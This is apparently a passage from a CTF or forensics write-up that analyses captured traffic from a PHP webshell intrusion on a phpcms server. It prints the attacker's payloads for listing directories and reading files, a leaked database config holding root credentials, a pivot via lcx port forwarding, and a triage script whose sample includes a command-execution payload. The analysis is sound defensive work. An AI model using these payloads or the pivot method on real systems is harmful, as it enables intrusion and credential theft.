@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/phpcms/
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/phpcms/libs/
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/phpcms/libs/data/
./   2017-09-03 03:31:16 4096    0777
font/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:16 4096    0777
ipdata/ 2017-09-03 03:31:16 4096    0777 
dict/   2017-09-03 03:31:16 4096    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/include/ (still does not exist)
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/caches/
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/caches/configs/
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// read the contents of the file /var/www/html/caches/configs/database.php (first attempt, no output captured)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// read the contents of the file /var/www/html/caches/configs/database.php (second attempt via readfile; this leaks the MySQL root credentials)
<?php                 
return array (           
    'default' => array ( 
        'hostname' => 'localhost',
        'port' => 3306,  
        'database' => 'phpcmsv9',
        'username' => 'root',
        'password' => '123456',
        'tablepre' => 'v9_',
        'charset' => 'gbk',
        'type' => 'mysqli',
        'debug' => true,
        'pconnect' => 0,
        'autoconnect' => 0
        ),
);                                           
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/include/ (no output captured)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/ (no output captured)

The attacker's approach and the full attack chain are now clear:
First, the attacker (172.16.10.110) obtained a webshell on a reachable Windows host, 192.168.20.117 (DedeCMS).
Then, using lcx, port 80 (phpcms) of the internal host 192.168.20.88 was forwarded to port 8888 on 172.16.10.110.
Through that forwarded port the attacker exploited further vulnerabilities and gained access to the internal host.
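The per-payload annotations above (which file was read, which directory was listed, which command was run) can be produced automatically from the http.txt dump. The following Python script is an added example for this writeup, not the author's tooling; it keys on the client's echo("X@Y") output marker, URL-decodes each request line before matching (the page shows the payloads already decoded), and the sample dump inside it is constructed from the payload shapes captured above.

```python
"""Triage webshell payloads in a tcpdump -A text dump (e.g. http.txt).

Classifies every request carrying the client's echo("X@Y") output marker as
a file read, a directory listing or a command execution and extracts the
target, reproducing the hand-written annotations in the writeup.
"""
import re
from collections import Counter
from urllib.parse import unquote

MARKER = 'echo("X@Y")'  # the shell client brackets its output with X@Y

# (kind, regex capturing the object the payload acts on)
PATTERNS = [
    ("exec", re.compile(r"\$s='(?P<target>[^']*)';.*?proc_open")),
    ("list", re.compile(r"\$D='(?P<target>[^']+)';\$F=@opendir")),
    ("read", re.compile(r"\$F=['\"](?P<target>[^'\"]+)['\"];.*?(?:fread|readfile)")),
]
# The client wraps each command as "cd <dir>;<cmd>;echo [S];pwd;echo [E]".
EXEC_WRAP = re.compile(r"^cd (?P<cwd>[^;]+);(?P<cmd>.*?);echo \[S\];pwd;echo \[E\]$")


def classify_payload(line):
    """Return (kind, target, cwd) for one request line, or None if not a payload."""
    line = unquote(line)  # decodes %XX sequences; harmless on already-decoded text
    if MARKER not in line:
        return None
    for kind, rx in PATTERNS:
        m = rx.search(line)
        if not m:
            continue
        target, cwd = m.group("target"), None
        if kind == "exec":
            w = EXEC_WRAP.match(target)
            if w:
                cwd, target = w.group("cwd"), w.group("cmd")
        return kind, target, cwd
    return "unknown", line[:60], None  # marker present but an unfamiliar action


def triage(dump_text):
    """Scan a dump line by line; return one finding dict per webshell request."""
    findings = []
    for lineno, line in enumerate(dump_text.splitlines(), 1):
        hit = classify_payload(line)
        if hit:
            findings.append({"line": lineno, "kind": hit[0],
                             "target": hit[1], "cwd": hit[2]})
    return findings


def summarize(findings):
    """Count findings per kind, e.g. {'read': 2, 'list': 2, 'exec': 1}."""
    return Counter(f["kind"] for f in findings)


# Constructed sample modelled on the payload shapes captured above (shortened).
SAMPLE_DUMP = r"""POST /9.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

t=@ini_set("display_errors","0");echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
GET /index.php?m=content HTTP/1.1
t=@ini_set("display_errors","0");echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR");};echo("X@Y");die();
t=@ini_set("display_errors","0");echo("X@Y");$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$fp=proc_open($r." 2>&1",$array,$pipes);echo("X@Y");die();
t=@ini_set("display_errors","0");echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);};echo("X@Y");die();
t=%40ini_set("display_errors","0");echo("X%40Y");$D=%27/var/www/html/%27;$F=@opendir($D);echo("X%40Y");die();
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_DUMP):
        print(f"line {f['line']:>4}  {f['kind']:<5} {f['target']}"
              + (f"  (cwd {f['cwd']})" if f["cwd"] else ""))
    print(dict(summarize(triage(SAMPLE_DUMP))))
```

Run it over the real http.txt instead of SAMPLE_DUMP to get the same read/list/exec timeline the writeup reconstructs by hand; reads of configs/database.php and configs/system.php are the ones to treat as credential exposure.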

At this point the HTTP-layer part of the challenge should be more or less fully analysed; once the actual questions are available the answers can be filled in directly.
This challenge also provides FTP logs,
so it should involve the FTP protocol as well.

#!/bin/bash
#ftp.sh
# Extract every packet involving the two FTP hosts from each capture into ./ftp/<file>

target_folder='ftp'

mkdir -p "${target_folder}"

for file in *.pcap;
do
   echo "Dumping ftp packets in ${file}..."
   # -w writes raw packets, so the output is a filtered pcap (the -A flag has no effect together with -w)
   tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r "$file" -w "${target_folder}/${file}"
   echo "${file} Done!"
done

There are FTP packets, but the IPs from the log do not seem to appear in them.
Perhaps my copy of the packet captures was incomplete?
